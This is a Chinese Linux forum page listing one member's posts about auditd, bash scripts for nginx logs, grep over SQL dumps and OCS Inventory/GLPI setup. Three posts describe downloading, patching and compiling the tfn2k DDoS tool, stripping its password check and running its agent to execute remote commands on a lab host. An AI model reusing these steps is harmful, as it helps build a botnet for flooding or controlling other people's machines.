顯示文章

這裡允許您檢視這個會員的所有文章。請注意, 您只能看見您有權限閱讀的文章。


文章 - zarr12steven

頁: 1 [2] 3
31
小弟愚味,想在請問一下

代碼: [選擇]
auditctl -w /home/test.txt  -p rw -k test
auditctl -l
LIST_RULES: exit,always watch=/home/test.txt perm=rw key=test
auditctl -a always,exit -F arch=b64 -S unlink
auditctl -l
LIST_RULES: exit,always watch=/home/test.txt perm=rw key=test
LIST_RULES: exit,always arch=3221225534 (0xc000003e) syscall=unlink


像我這樣的寫法是指會針對/home/test.txt 只做監控刪除的監控?煩請大大指教


而且我發現當這個工具啟用時,只有要user登入,好像也會做紀錄,不能單單只紀錄/home/test.txt相關活動的紀錄?

32
回darkranger大大:

這個我沒用過,不過我先試試!感謝您的指教! :)

33
各位大大好:
想請教一下,因我目前有一個資料夾,裡面都是一些圖片檔,常常被砍掉裡面的所有圖片,但目前不確定是被誰(daemon),那目前小弟的做法是直接在那資料夾做一個假的檔案,叫test.jpg,並且透過inotifywatch去監控那隻test.jpg,我目前所能獲得的資訊只有幾點幾分被砍,但不知道該如何追蹤是被誰砍掉?煩請有經驗的大大指導!

34
程式討論版 / Re: shell script 求救
« 於: 2013-12-20 12:28 »
謝謝hongbin大大的指導,小弟已經測試成功了!

附上完成的script

代碼: [選擇]
#!/bin/bash
src="/backup/test/temp/"
dest1="/backup/test/pickup-primary/1/"
dest2="/backup/test/pickup-backup/321/"
dest3="/backup/test/pickup-primary/46/"
dest4="/backup/test/pickup-backup/89"

   i=1
   while read line
   do 
        cat $line | while read item
          do             
                if [ -e $src$item ]; then
                        echo "exists"
                        eval echo "$src$item to \$dest$i"
                fi
          done
        #i=$(( $i+1 ))    ===> 用這個或下面那個都可以執行
        i=`expr $i + 1`
   done  < $1

上面這支主要是要來把特定的檔案搬到相對應的目錄下
小弟是將所有的特定的檔案都各別存成一個test.txt   test1.txt  test2.txt  test3.txt,然後再將text*.txt存成file.txt
然後執行時,就打  sh mv.sh file.txt,就可以跑出我要的結果了。

最後再次感謝hongbin大大!!

35
Network 討論版 / Re: 遠端Linux CPU 偵測問題
« 於: 2013-12-19 23:56 »
樓主大大
小弟是透過sysstat寫成script,然後把值丟給遠端的mrtg,然後就可以畫成圖嚕!可以參考看看!

36
程式討論版 / shell script 求救
« 於: 2013-12-19 17:39 »
各位大大好:

代碼: [選擇]
#!/bin/bash
src="/backup/test/temp/"
dest1="/backup/test/pickup-primary/1/"
dest2="/backup/test/pickup-backup/321/"
dest3="/backup/test/pickup-primary/46/"
dest4="/backup/test/pickup-backup/89"
while read line
do
if [ -e $src$line ]; then
        echo "exists"
        echo "$src$line to $dest1"
fi
done < $@

我已經將要read line的檔案都存在自已的家目錄底下,總共有四個file.txt,裡面都是存檔案的名字
主要目的是:希望當我去執行這支shell script,$@會把我的家目錄底下的4支file.txt給吃進來時, $dest1會隨著吃完$@時做+1的動作,已達成全自動的目的!


但目前卻只能寫成半自動的,只好每次都進來修改$dest後面這個數字,請問小弟應該如何修改才能寫成全自動?


我執行下面的script, sh -x test.sh  file1.txt file2.txt file3.txt file4.txt,出現: No such file or directory

代碼: [選擇]
#!/bin/bash
src="/backup/test/temp/"
dest1="/backup/test/pickup-primary/1/"
dest2="/backup/test/pickup-backup/321/"
dest3="/backup/test/pickup-primary/46/"
dest4="/backup/test/pickup-backup/89"
while read line
do
if [ -e $src$line ]; then
        echo "exists"
        i=1
        echo "$src$line to $dest$i"
fi
i=$(($i+1))
done < $@


37
Windows 討論版 / 【請教】windows server 版本
« 於: 2013-10-30 12:19 »
各位大大好:

小弟公司目前內部要安裝一台windows server來做AD,不曉得大家都是用windows server 2008 R2還是windows server 2012 R2?
哪一個比較好用? ??? ??? ???之後還會跟ldap做整合@@


ps  公司打算用pc來架,core i3的機器會太弱嗎?


38
Linux 討論版 / Re: 新手提問
« 於: 2013-07-22 17:23 »
其實opensuse也不錯? ???

這是小弟剛起步所學的,也有網站可以參考唷!如下↓↓

http://www.suse.url.tw/sles10/

39
Linux 討論版 / Re: 請問 Linux HA Service cluster
« 於: 2013-07-22 17:21 »
您好,不曉得您要的是不是lvs+keepalived?這個也不錯?

40
程式討論版 / Re: [求救] 使用grep
« 於: 2013-06-21 18:17 »
其實我還沒有解決,但有大概的方向了!朝正則去改。

41
程式討論版 / Re: [求救] 使用grep
« 於: 2013-06-21 14:51 »
抱歉,問了個蠢問題,要煩請版主幫我砍掉

42
程式討論版 / [求救] 使用grep
« 於: 2013-06-19 19:27 »
各位大大好:

小弟遇到一個很棘手的問題,我有一堆整理過的sql資料,已存成文字檔,但因主管要求需要過濾找出,第一行為UPDATE git.lab,第二、四行結尾為WHERE u_id='123456' 這種的 <---裡面數字會換,且又要排除UPDATE git.lab SET u_name = 'GG' WHERE `u_id`  = '476532'這種的為一行的,請問我該如何下?或是轉寫成shell script?(因檔案有100多個)


正確要的資料如下:
這是取四行的結果:
UPDATE git.lab SET u_name='user', u_city='', u_addr='台北縣',^M
         u_post='813', u_tel='09xxxxxxx', u_page='http://', u_page_name='',^M
         u_intro='', u_sex='2',u_acc='xxxx@yahoo.com.tw',u_email='xxxxxx@yahoo.com.tw',u_byr='1987', u_bmn='11', u_bdy='21',^M
         u_cname='xxx',u_eid=''  ,u_city_id =20 WHERE u_id='405306'
這是取二行結果:
UPDATE git.lab ^M
                SET u_city_id='4', u_addr='新北市', u_post='234'   , u_byr='1987', u_bmn='1', u_bdy='8', u_birthday_changed='Y'  , u_cname='xxx' , u_sex='2', u_photo='girl',u_update=now() WHERE u_id='405394'
/

要排除的→ UPDATE git.lab SET u_count=u_count+'10', u_count_num =u_count_num+'10', u_point =u_point+'1' WHERE u_id='70904'


我目前用grep -A 4 UPDATE git.lab >> test.txt

煩請各位大大指導小弟。

43
程式討論版 / Re: shell script請教read?
« 於: 2013-03-05 18:37 »
沒關系,也很感謝dark大大在此留言,讓小弟有學習的機會。
to netman大大:
感謝你的提醒,我已經有解決大部份的問題,不過仍有缺點,尚在改進中,先附上自已寫的腳本

#!/bin/bash
log=`ls -la | grep nginx-access.log | awk '{print $9}'`
for i  in $log
  do
    IP=`/usr/bin/awk '{print $1}' $i | /usr/bin/sort | /usr/bin/uniq > /home/test/IP.txt`
        while read line
          do
               count=`/bin/cat $i | /bin/grep $line | /bin/grep 'GET /photo' | /usr/bin/wc -l`
               count1=`/bin/cat $i | /bin/grep $line | /bin/grep 'GET /images' | /usr/bin/wc -l`
               echo "IP:$line  Get Photo count:$count" >> /home/test/GET_count_$i.txt
               echo "IP:$line  Get Images count:$count1" >> /home/test/GET_count_$i.txt
          done < /home/test/IP.txt

    /usr/bin/awk -F: '{print $3}' /home/test/GET_count_$i.txt | /usr/bin/awk 'BEGIN{total=0}{for(i=1;i<=NF;i++)total+=$i;}END{printf("total=%d\n",total)}' >> /home/test/GET_count_$i.txt
    time=`ls -la $i| awk '{print $6,$7}'`
    date=`echo $time | date +%F -d  "$time"`
    /usr/bin/awk '{for(i=1;i<=NF;i++)printf("%-20s",$i); printf("\n");}' /home/test/GET_count_$i.txt >> /home/test/GET_$date.txt
done

目前這個shell的缺點,就是只能分析nginx-access.log相關的檔案,但當目錄裡面有含nginx-access.log.gz 或是nginx-access.log.tar.gz相關的話,就會失敗。

44
程式討論版 / Re: shell script請教read?
« 於: 2013-03-05 10:14 »
謝謝netman大大的指教,不過我有個疑問想請教,假設我寫for log in /var/log/nginx-access.log /var/log/xxxx.log /var/log/yyy.log /var/log/zzz.log,那如果我有二十個檔案,不就要寫二十次?


至於時間的話,假設我分析的log是nginix-access.log,我去ls -la nginx-access.log這個檔案,得到

-rw-r-----  1 root root 401568505 Feb 28 17:04 nginx-access.log

透過上面的script分析完之後,想把ls -la nginx-access.log這個檔案的時間(Feb 28),將分析完的log的結果,存成Feb 28.txt


若有詞不達意,請見諒! :P




45
程式討論版 / shell script請教read?
« 於: 2013-03-04 15:50 »
#!/bin/bash
log="/var/log/nginx-access.log"
IP=`/usr/bin/awk '{print $1}' $log | /usr/bin/sort | /usr/bin/uniq > /home/test/IP.txt`

while read line
do
       count=`/bin/cat $log | /bin/grep $line | /bin/grep 'GET /photo' | /usr/bin/wc -l`
       count1=`/bin/cat $log | /bin/grep $line | /bin/grep 'GET /images' | /usr/bin/wc -l`
       echo "IP:$line  Get Photo count:$count" >> /home/test/GET_count.txt
       echo "IP:$line  Get Images count:$count1" >> /home/test/GET_count.txt
done < /home/test/IP.txt

/usr/bin/awk -F: '{print $3}' /home/daniel/GET_count.txt | /usr/bin/awk 'BEGIN{total=0}{for(i=1;i<=NF;i++) total+=$i;}END{printf("total=%d\n",total)}' >> /home/test/GET_count.txt

/usr/bin/awk '{for(i=1;i<=NF;i++)printf("%-20s",$i); printf("\n");}' /home/daniel/GET_count.txt > /home/test/GET_test.txt


想請問一下,因為log有很多個,但我是用read這個去做讀取,但是沒有辦法做到讓read讀取第一個log的時候,先把第一個log先分析完,再放入第二個log做分析,要麻煩各位大大指點一下迷津。

另外想再請問一下,要怎樣才可以把要分析的log的時間,存成檔案,我的意思如下
-rw-r-----  1 root root 401568505 Feb 28 17:04 nginx-access.log

就是透過上面那支script分析nginx-access.log,然後分析完的結果存成Feb 28.txt

煩請指教....!!!



46
Linux 討論版 / Re: 請教Nagios自動發信的問題
« 於: 2012-07-24 17:56 »
Shrekc大你好:

因為你是要用mutt去做寄信,那你的command.cfg檔也要去做定義!可以修改預設的試試看!!!


47
補充一下~!昨天忘了說,即使我把整個密碼驗証拿掉後,在我編譯時,它還是會要我輸入8-16位的密碼,想請問一下,不是把密碼整段註解掉,它就不會編譯了不是是嗎?怎麼還會要我輸入密碼 ???

48
註解掉以下的密碼驗証
vim config.h

/*#define REQUIRE_PASS*/

vim tfn.c
   
/*#ifdef REQUIRE_PASS
void passchk (void);
#endif*/

/*#ifdef REQUIRE_PASS
  passchk ();
#endif*/

/*#ifdef REQUIRE_PASS
void
passchk (void)
{
  char test1[100] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", test2[100] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",
    enc1[100], enc2[100], *p = getpass ("\n^[[0;0mPassword verification:");

  memset (enc1, 0, 100);
  memset (enc2, 0, 100);

  security_through_obscurity (1);
  encode64 (test1, enc1, strlen (test1));
  security_through_obscurity (0);
  aes_setkey (p);
  encode64 (test2, enc2, strlen (test2));

  if (strcmp (enc1, enc2))
    {
      fprintf (stderr, "Sorry, passwords do not match.\n");
      fprintf (stderr, "1 %s\n2 %s\n", enc1, enc2);
      exit (0);
    }
}
#endif*/

# ./tfn -h 192.168.1.32 -c 10 -i "mkdir testfile"

        Protocol      : random
        Source IP     : random
        Client input  : single host
        Command       : execute remote command

Sending out packets: .

darkranger大大,我照了您的方式去做修改後,有去修改以上設定檔,但仍然無法控制用戶端!!

49
請問各位大大:
小弟最近在研究tfn2k這個工具,我有在centos 5.8 x64及ubnutn 11.04 x64的系統上做編譯,也上網查過相關文章,沒看到有人有這方面的解法,故~到此版詢求有經驗的版大指點迷津,我附上我的做法及錯誤訊息。

實測環境 ubuntu 11.04 x64  皆有二台ubuntu
主控端:192.168.1.1
被控端:192.168.1.2


# wget http://www.xfocus.net/tools/200405/tfn2k.tgz
#tar zxvf tfn2k.tgz
#cd tfn2k/src
#vim ip.h
修改123行,並注解掉以下
#ifndef in_addr
/*struct in_addr
  {
    unsigned long int s_addr;
  };*/
vim mkpass.c
修改87行,並加入0777
原始:fd = open ("pass.c", O_WRONLY | O_TRUNC | O_CREAT);
修改後:fd = open ("pass.c", O_WRONLY | O_TRUNC | O_CREAT, 0777);


vim disc.c
修改30行,並加入0777
原始:close (open ("agreed", O_WRONLY | O_CREAT | O_TRUNC));
修改後:close (open ("agreed", O_WRONLY | O_CREAT | O_TRUNC, 0777));

#make
按完yes後,會需要輸入8-16碼的密碼,即可完成。

然後我就透過scp把td檔丟到另一台虛擬機,並將td 檔改成以下權限
-rwxr-xr-x 1 root   root   42384 2012-07-13 16:16 td
再回到主控端執行 ./tfn -h 192.168.1.2  -c 10 -i "mkdir test"
會要求你輸入當時編譯時輸入的密碼

        Protocol      : random
        Source IP     : random
        Client input  : list
        Command       : execute remote command

Password verification:
Sorry, passwords do not match.
1 IyD//wAAAACPTP//AAAAAICb//8AAAAAhVT//wAAAABwZuXtAAAAAP0Q//8AAAAAAAAAAA
2 IIH//wAAAADUGiXhAAAAAHtk//8AAAAAg6T//wAAAAAFb///AAAAAElmxRMAAAAAAAAAAA



煩請各位大大指點迷津



50
sorryboy你好:
你可能需要檢查一下你的全域設定哦? ???

51
中文亂碼問題可以參考http://forums.ocsinventory-ng.org/viewtopic.php?id=9624
以下方法確認對2.0.2 有效,且可以看到Win7_x64的序號,不過OS name 還是會有亂碼,但是已經好很多了
------------------------------------------------------------------------------------------
On "require/function_table_html.php" line 1336
change
$htmlentities=true;
to
$htmlentities=false;

And on "require/function_machine.php" line 109
comment line
$value=htmlentities($value);
------------------------------------------------------------------------------------------
(測試環境是用CentOS 5.7架的vm,官方就有架好的vm , http://www.ocsinventory-ng.org/en/download/download-server.html)

另一種方法我用了還未成功過,不過有人說此法有效
------------------------------------------------------------------------------------------
In your OCS directory (like "/usr/share/ocsinventory-reports/ocsreports") and below : search all .php files contains "htmlentities("
replace all
"htmlentities($*);"
to
"htmlentities($*,ENT_COMPAT | ENT_HTML401,"UTF-8");"
------------------------------------------------------------------------------------------


謝謝adolph學長的資訊,我會在近期內做測試!!!非常感謝^^
後續有測試成功會再po文!

52
先推一下
有機會來台北分享一下嗎?



謝謝sakana學長的邀請,分享是沒問題,只怕自已的表達不好。

不用擔心,酷學園會為你打氣加油
十二月 可以嗎............




謝謝huckly學長,十二月ok~~~但因目前2.0.2有功能還沒測試完....可以以1.3.2版的做分享嗎?

53
先推一下
有機會來台北分享一下嗎?



謝謝sakana學長的邀請,分享是沒問題,只怕自已的表達不好。

54
更新:
哈!真是有點白忙一場,因為我發現原來我安裝的版本1.3.2太舊了,所以plug-in是不支援,因此,我又到官網翻文件:http://wiki.ocsinventory-ng.org/index.php/Plugins:ManageMSofficeKey 來看,重新做了一次,這次安裝的是版本2.0.2,目前是有成功把plug-in加進去,目前已安裝client端了,序號還沒成功被抓取,還要在看一下哪裡有出錯,顯示所有時,中文依然還是會亂碼,還在努力找答案中…!!

55
因3.『Windows Registry 』已有設定了,但無法被啟用,所以小弟有找到是以plug-in的方式想法來做,目前有找到的答案是:

http://wiki.ocsinventory-ng.org/index.php/Plugins:MSofficeKey#Modifiy_the_engine

但尚未測試實做,預計這幾天會來實做,後續有成功會再po文!

56
$sudo apt-get install libapache2-mod-php5 php5-cli php5-common php5-cgi mysql-server php5-mysql

$sudo apt-get install build-essential

$sudo apt-get install libapache2-mod-perl2 php5-gd libxml-simple-perl libcompress-zlib-perl libdbi-perl libdbd-mysql-perl libapache-dbi-perl php-pear php5-dev libnet-ip-perl

$sudo apt-get update

$sudo apt-get upgrade

$sudo wget ftp://linvinus.ru/ocs/1.3.2/OCSNG_UNIX_SERVER-1.3.2-linvinus-with-utf8_patch.tar.gz

$sudo tar xvf OCSNG_UNIX_SERVER-1.3.2-linvinus-with-utf8_patch.tar.gz

$ cd ocsinventory-server-1.3.2

確認以上套件都有裝入後,即可執行

$ sudo sh setup.sh

跳出來選項都使用預設值即可,安裝完成後,需重新啟動apache2

$sduo service apache2 restart

登入:http://伺服器IP/ocsreports/install.php做設定
1.   設定連結SQL,需和之前LAMP時設定SQL要一致,輸入完畢後,按『send』。
2.   按『送出查詢』
3.   點選『Click here to enter OCS-NG GUI』
4.   進入到登入畫面,預設帳密為『admin』

========================================================================================

安裝GLPI
先至官網 http://www.glpi-project.org/?lang=en 下載最新套件,已支援繁體中文。
$sudo wget https://forge.indepnet.net/attachments/download/974/glpi-0.80.4.tar.gz
$sudo tar xvf glpi-0.80.4.tar.gz
$ sudo cp -a glpi  /var/www
$cd /var/www
$sudo chown www-data.www-data –R glpi
要是有遇到File does not exist: /etc/apache2/htdocs
解決方式:
這是因為一般網頁都會放在/etc/apachee2/htdocs裡,這個文件不見了,導致找不到網站,所以我們要找/etc/apache2/http.conf檔,並新增DocumentRoot /var/www,重啟apache就可以了,這應該是重新定義網站根目錄的位置。

登入: http://伺服器ip/glpi

1.   選擇語系:繁體中文
2.   同意條款
3.   點選『安裝』
4.   點選『繼續』
5.   設定連結資料庫,Mysql主機:localhost  Mysql使用者:root  Mysql密碼:使用者自定
6.   創建一個新的資料庫為『glpi』
7.   點選『繼續』
8. 設定完成,點選『使用GLPI』
9. 進入到登入頁面,預設帳密:『glpi』
10. 登入到主畫面,準備要開始設定與ocs-ng的資料庫做連結
11. 點選『設定』→『一般』,設定啟用ocsng模式為『是』
12. 點選『localhost』
13. 『設定』→『OCSNG模式』→『通用』OCSNG資料庫使用UTF-8 設定為『是』,點選『更新』
14. 『設定』→『OCSNG模式』→『一般資訊』,將所有的否設定為『是』,點選『確定』,完成。




以下網址是小弟參考的來源:
ftp://linvinus.ru/ocs/
http://blog.163.com/ywz_306/blog/static/1325771120114311516668/
http://blog.chinaunix.net/space.php?uid=210925&do=blog&id=8902
http://vicchen39.pixnet.net/blog/category/794287
http://hi.baidu.com/lue_liu/blog/item/2b83ed059ec511121c958365.html




以上我都有在實際環際安裝成功,但目前尚有發現幾個問題
1.download下來的檔案,會有亂碼,但可以用記事本開啟後,選另存新檔,編號選『ANSI』即可解決。

2.目前無法抓到WINDOWS 旗艦版 X64 的序號。
3.『Windows Registry 』已有設定了,但無法被啟用,還在找問題中.....!!!

以上,如果有先進會解決的話,煩請指導小弟!謝謝!
第一次PO安裝文,如有錯誤,請各位多多指教!^^

57
其實你可以自行定義!不會有什麼不良影響,但可以以你自已的需求做切割,如果不懂切出來的哪些功能是做什麼的話,可以去鳥哥網站看唷,那有詳細說明各個切出來的磁區功能!

58
謝謝netman大大今天的無私分享,讓小弟知道該從哪個方向努力!! :D
不過也希望netman大大也可以來台北場辦一場!呵呵!

59
請問大大~這場演講會有台北場嗎?小弟還蠻想聽的! ???

60
感謝這次主辦人和講師,讓小弟有這機會參加,也讓我對dns又有更深層的了解!謝謝各位的不吝指導!

頁: 1 [2] 3